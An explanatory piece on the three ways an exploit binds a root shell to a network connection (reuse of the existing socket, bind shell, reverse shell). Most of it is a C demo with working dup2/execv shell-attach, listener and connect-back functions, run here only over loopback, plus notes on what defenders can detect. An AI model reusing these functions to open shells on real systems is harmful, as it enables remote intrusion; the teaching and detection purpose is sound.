The "holy grail" of an attack (such as a buffer overflow) is the creation of a "root shell". On UNIX, the "root" user has complete control over the machine, so an exploit tries to obtain a shell prompt from which any command can be entered and will execute with root privileges. In many remote attacks, the attacker runs an exploit script that breaks into the server and then establishes a root shell bound to a TCP connection, so that commands can be entered into the system remotely. There are three ways such a shell can be bound to a connection:

- conversion: The TCP connection already used to exploit the server (such as an FTP, DNS or RPC connection) is converted into the shell prompt. No new connection is opened, so whatever firewall rules let the exploit traffic in also carry the shell.
- listen: The most popular mechanism is to register /bin/sh within the inetd service, bound to a particular port (a "bind shell"). This lets the attacker back into the server at any time simply by connecting to that port. It has the disadvantage that firewalls will often block access to the additional port, and the open port is visible to anyone who scans the machine.
- connect: The exploit code creates an outbound connection from the exploited machine back to a listener on the attacker's machine (a "reverse shell"). Because the connection originates from inside, it passes firewalls that block inbound connections but allow outbound ones.
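As an added example (not code from the original page), here is a C program that exercises all three bindings on a single machine: attacker and victim are the two halves of a fork(), a socketpair stands in for the exploit's existing connection in the conversion case, and 127.0.0.1 is used for the listen and connect cases. The function names (attach_shell, bind_shell_listener, connect_back, drive_shell, demo_conversion, demo_tcp, binding_ok) are my own. The point it makes is that the three techniques differ only in how the socket is obtained; once a connected socket exists, the same dup2()/execv() sequence turns it into a shell.

```c
/* Added illustration (not code from the original page): the three bindings above
 * end in one shared step, dup2() the connected socket onto fds 0/1/2, exec /bin/sh. */
#define _DEFAULT_SOURCE 1
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
/* Common core: the connected socket becomes the shell's stdin/stdout/stderr. */
int attach_shell(int sock)
{
    if (dup2(sock, 0) < 0 || dup2(sock, 1) < 0 || dup2(sock, 2) < 0) return -1;
    if (sock > 2) close(sock);
    char *argv[] = { "/bin/sh", NULL };
    execv("/bin/sh", argv);
    return -1;                              /* only reached if execv() failed */
}

/* "listen": TCP listener on 127.0.0.1 (port 0 = kernel picks one). A bind shell
 * accept()s on it and hands the accepted socket to attach_shell(). */
int bind_shell_listener(unsigned short port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (fd < 0 || bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 1) < 0) {
        close(fd); return -1;
    }
    return fd;
}

/* "connect": dial out to the attacker's listener; the socket goes to attach_shell(). */
int connect_back(const char *ip, unsigned short port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(port) };
    if (fd < 0 || inet_pton(AF_INET, ip, &sa.sin_addr) != 1 ||
        connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(fd); return -1;
    }
    return fd;
}

/* Attacker's view: fork a "victim" that attaches /bin/sh to victim_end, send cmd
 * over attacker_end, and return the bytes the shell wrote back. */
ssize_t drive_shell(int attacker_end, int victim_end, const char *cmd, char *out, size_t outlen)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                         /* victim: the exploited process */
        close(attacker_end); attach_shell(victim_end); _exit(127);
    }
    close(victim_end);
    if (write(attacker_end, cmd, strlen(cmd)) < 0) return -1;
    shutdown(attacker_end, SHUT_WR);        /* EOF on stdin makes the shell exit */
    size_t total = 0; ssize_t n;
    while (total < outlen - 1 && (n = read(attacker_end, out + total, outlen - 1 - total)) > 0)
        total += (size_t)n;
    out[total] = '\0';
    close(attacker_end);
    waitpid(pid, NULL, 0);
    return (ssize_t)total;
}

/* conversion: reuse the exploit's existing connection (a socketpair stands in). */
ssize_t demo_conversion(char *out, size_t outlen)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    return drive_shell(sv[0], sv[1], "echo conversion-ok\n", out, outlen);
}

/* listen (victim_listens = 1): victim opens the port, attacker connects in.
 * connect (victim_listens = 0): attacker opens the port, victim dials back out. */
ssize_t demo_tcp(int victim_listens, char *out, size_t outlen)
{
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    int lfd = bind_shell_listener(0);
    if (lfd < 0 || getsockname(lfd, (struct sockaddr *)&sa, &len) < 0) return -1;
    int dialer = connect_back("127.0.0.1", ntohs(sa.sin_port));
    if (dialer < 0) { close(lfd); return -1; }   /* never block in accept() */
    int accepted = accept(lfd, NULL, NULL);
    close(lfd);
    if (accepted < 0) { close(dialer); return -1; }
    return victim_listens ? drive_shell(dialer, accepted, "echo listen-ok\n", out, outlen)
                          : drive_shell(accepted, dialer, "echo connect-ok\n", out, outlen);
}

/* Run binding `which` (0 conversion, 1 listen, 2 connect); 1 if its marker came back. */
int binding_ok(int which)
{
    static const char *marker[] = { "conversion-ok", "listen-ok", "connect-ok" };
    char buf[256];
    ssize_t n = which ? demo_tcp(which == 1, buf, sizeof buf) : demo_conversion(buf, sizeof buf);
    return n > 0 && strstr(buf, marker[which]) != NULL;
}
int main(void) { printf("conversion %d listen %d connect %d\n", binding_ok(0), binding_ok(1), binding_ok(2)); return 0; }
```

Compile with cc and run; each binding prints 1 when the marker echoed by the shell arrived back over the socket. Each technique also leaves a different trace for a defender: a bind shell shows up as an unexpected listening port, a reverse shell as an unexpected outbound connection from a server process, and a converted connection as a service socket now held by /bin/sh rather than by the daemon that accepted it.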